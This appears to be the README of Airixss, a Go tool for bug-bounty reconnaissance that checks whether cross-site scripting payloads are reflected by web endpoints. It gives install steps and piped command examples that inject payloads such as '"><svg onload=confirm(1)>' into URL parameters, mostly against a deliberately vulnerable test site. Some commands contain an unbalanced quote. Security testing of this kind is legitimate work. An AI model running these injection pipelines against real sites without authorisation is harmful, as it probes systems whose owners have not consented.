README
¶
Airixss
Airixss is for checking reflection in recon process to find possible xss vulnerable endpoints.
Contents:
- Installation & Requirements:
You need to install chromedp lib first ->
▶ go get -u github.com/chromedp/chromedp
Installing the tool ->
Using go
▶ go get -u github.com/ferreiraklet/airixss
Using git clone
▶ git clone https://github.com/ferreiraklet/airixss.git
▶ cd airixss
▶ go build airixss.go
▶ chmod +x airixss
▶ ./airixss -h
- Usage & Explanation:
In Your recon process, you may find endpoints that can be vulnerable to xss,
-
By replacing the "SameValue" to a xss payload, In order to see if there is reflection/vulnerable, it is when you use airixss
Stdin - Single urls
echo 'https://redacted.com/index.php?user=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E' | airixss -payload "confirm(1)"
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
In -payload flag, you need to specify a part of the payload used in url, -payload "value_will_be_checked_reflection"
Stdin - Read from File
cat targets | airixss -payload "alert(1)"
Adding Headers
Pay attention to the syntax!
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" -H "header1: value1;Header2: value2"
Using Proxy
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" --proxy "http://yourproxy"
Headless Mode
Headless mode is a "simulated" browser process that checks for the xss pop-up
It has much more accuracy, however, it is slower than normal method. ( experimental mode )
Usage:
- Attention - Using more than 5 concurrencys may generate errors!
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss --headless-mode -c 5
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss --headless-mode --only-poc -c 5
Using Proxy:
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss --headless-mode -c 5 --proxy "http://yourproxy"
Chaining with other tools
echo "http://testphp.vulnweb.com" | waybackurls | anew | gf xss | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1) -H "Header1: Value1;Header2: value2"
echo "http://testphp.vulnweb.com" | waybackurls | nilo | anew | gf xss | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1) -H "Header1: Value1;Header2: value2" --proxy "http://yourproxy"
echo "http://testphp.vulnweb.com" | waybackurls | nilo | anew | gf xss | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1) -H "Header1: Value1;Header2: value2" --proxy "http://yourproxy"
echo "http://testphp.vulnweb.com" | waybackurls | anew | gf xss | nilo | qsreplace '"><svg onload=confirm(1)>' | airixss --headless-mode --only-poc -c 5
Check out some of my other programs
Nilo - Checks if URL has status 200
Jeeves - Time based blind Injection Scanner
Please, also check these =>
If any error in the program, talk to me immediatly.
This project is for educational and bug bounty porposes only! I do not support any illegal activities!.
Documentation
¶
There is no documentation for this package.
Source Files